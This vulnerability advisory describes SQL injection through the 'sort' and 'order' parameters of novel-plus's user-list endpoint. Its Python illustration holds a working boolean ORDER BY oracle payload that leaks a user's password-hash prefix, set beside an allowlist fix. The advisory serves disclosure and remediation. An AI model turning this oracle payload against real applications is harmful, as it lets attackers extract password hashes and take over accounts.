xxyopen Novel-Plus SQL Injection Vulnerability in User Management Module

Vulnerability

A SQL injection vulnerability has been identified in the xxyopen/201206030 novel-plus application, affecting versions through 5.1.3. The flaw is in the User Management Module, in the UserMapper.xml mapper: the '/list' endpoint passes the 'sort' and 'order' request parameters into the ORDER BY clause of the user query as raw text rather than as validated column names and sort directions. Because ORDER BY identifiers cannot be bound as prepared-statement parameters, this is a common place for string concatenation to survive in otherwise parameterized mappers. An authenticated user can therefore inject SQL and read data the endpoint was never meant to return, including usernames, email addresses and password hashes from the 'sys_user' table.

Impact

Exploitation lets an attacker run attacker-controlled SQL against the application database and extract sensitive user information, including password hashes. Hashes recovered this way can be cracked offline and used to take over user accounts.

Reproduction

To reproduce, as an authenticated user send a GET request to the '/sys/user/list' endpoint with crafted 'sort' and 'order' parameters. Because the values are spliced directly into the ORDER BY clause, a time-based payload (for example a database sleep call injected through 'sort') delays the response by a chosen number of seconds, which demonstrates the injection without having to read data back in the response.
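The following Python model, added here as an illustration and not taken from novel-plus or its MyBatis mappers, reproduces the mechanism against an in-memory SQLite table: a query that splices 'sort' and 'order' into ORDER BY as raw text (the effect of MyBatis `${}` substitution), the same query hardened with an allowlist, and a boolean ORDER BY oracle that leaks whether a target's password hash starts with a given prefix. The sample rows and the column names username, email and password are constructed assumptions for this example; SQLite has no sleep function, so the oracle shows the same primitive via row order instead of response time.

```python
import sqlite3

# Constructed sample rows standing in for the sys_user table; the column
# names (username, email, password) are assumptions for this illustration.
SAMPLE_USERS = [
    (1, "alice", "alice@example.com", "$2a$10$hashA"),
    (2, "bob", "bob@example.com", "$2a$10$hashB"),
    (3, "carol", "carol@example.com", "$2a$10$hashC"),
]


def make_db():
    """Build an in-memory database with the constructed sys_user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sys_user (id INTEGER, username TEXT, email TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn, sort, order):
    """Pattern the advisory describes: request parameters are spliced into
    the ORDER BY clause as raw text, so no parameter binding ever sees them."""
    sql = f"SELECT id, username FROM sys_user ORDER BY {sort} {order}"
    return [row[1] for row in conn.execute(sql)]


# Allowlists: the only column names and directions the endpoint may sort by.
ALLOWED_SORT = {"id": "id", "username": "username", "email": "email"}
ALLOWED_ORDER = {"asc": "ASC", "desc": "DESC"}


def list_users_hardened(conn, sort, order):
    """Hardened form: map the parameters onto fixed identifiers before they
    reach the SQL text; anything outside the allowlist is rejected."""
    try:
        column = ALLOWED_SORT[sort.lower()]
        direction = ALLOWED_ORDER[order.lower()]
    except (KeyError, AttributeError):
        raise ValueError("invalid sort/order parameter") from None
    sql = f"SELECT id, username FROM sys_user ORDER BY {column} {direction}"
    return [row[1] for row in conn.execute(sql)]


def hardened_rejects(conn, sort, order):
    """True if the hardened handler refuses this sort/order pair."""
    try:
        list_users_hardened(conn, sort, order)
    except ValueError:
        return True
    return False


def hash_prefix_payload(username, prefix):
    """Boolean oracle payload for the 'sort' parameter: the row order flips
    depending on whether the target's password hash starts with `prefix`,
    so one request answers one yes/no question with no UNION and no second
    statement. The literals are inlined only to show the mechanism."""
    return (
        "(CASE WHEN (SELECT substr(password, 1, {n}) FROM sys_user "
        "WHERE username = '{u}') = '{p}' THEN id ELSE -id END)"
    ).format(n=len(prefix), u=username, p=prefix)


def oracle_says_prefix_matches(conn, list_fn, username, prefix):
    """Compare the natural order with the order produced by the injected
    CASE expression: unchanged means the condition was true, reversed means
    false. Raises ValueError if list_fn rejects the payload."""
    baseline = list_fn(conn, "id", "ASC")
    probed = list_fn(conn, hash_prefix_payload(username, prefix), "ASC")
    return probed == baseline


if __name__ == "__main__":
    db = make_db()
    print(oracle_says_prefix_matches(db, list_users_vulnerable, "alice", "$2a$"))
    print(oracle_says_prefix_matches(db, list_users_vulnerable, "alice", "$2b$"))
    print(hardened_rejects(db, hash_prefix_payload("alice", "$2a$"), "ASC"))
```

Run stand-alone it prints True, False, True: the vulnerable query answers the oracle correctly in both directions, while the hardened query never lets the payload reach the database. The fix to look for in a real mapper is the same shape as `list_users_hardened`: resolve 'sort' and 'order' to a fixed set of column names and directions in code, and never concatenate the request values into the SQL text.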

Added: Jun 24, 2025, 1:17 AM
Updated: Jun 24, 2025, 1:17 AM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact          2.5
exploitability  4.6
remediation     0.0
relevance       0.2
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.